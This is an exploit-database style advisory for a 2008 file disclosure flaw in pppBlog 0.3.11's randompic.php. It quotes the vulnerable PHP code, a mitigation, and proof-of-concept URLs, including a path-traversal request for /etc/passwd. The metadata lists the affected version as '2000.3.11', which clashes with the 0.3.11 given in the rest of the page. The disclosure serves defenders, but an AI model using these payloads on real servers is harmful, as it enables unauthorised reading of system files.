pppBlog - exploit.company

vendor:

pppBlog

by:

JosS

7.5

CVSS

HIGH

System File Disclosure

CWE

Product Name: pppBlog

Affected Version From: 2000.3.11

Affected Version To: 2000.3.11

Patch Exists: YES

Related CWE: N/A

CPE: pppblog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: localhost

2008

pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability

pppBlog version 0.3.11 and below is vulnerable to system file disclosure due to improper input validation. An attacker can exploit this vulnerability to read arbitrary files from the server. The vulnerable code is present in randompic.php at lines 66-72. The PoC for this vulnerability is randompic.php?files[0]=[file] and randompic.php?files[0]=../../../../../../../../../../etc/passwd. This exploit was tested on localhost with register_globals = On.

Mitigation:

Disable register_globals and ensure proper input validation.

Source

Exploit-DB raw data:

# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# In memory of rgod ;)

*Requeriments: register_globals = On

vulnerable code in randompic.php at lines 66-72:
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
    if (is_file($files[$randnum])){
	readfile("$dir/$files[$randnum]");
    }
}
...

poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../../../etc/passwd

linked: http://milw0rm.com/exploits/1853 (pppBlog 0.3.8, thanks rgod).

tested on localhost with register_globals = On.

Hack0wn :D

# milw0rm.com [2008-11-03]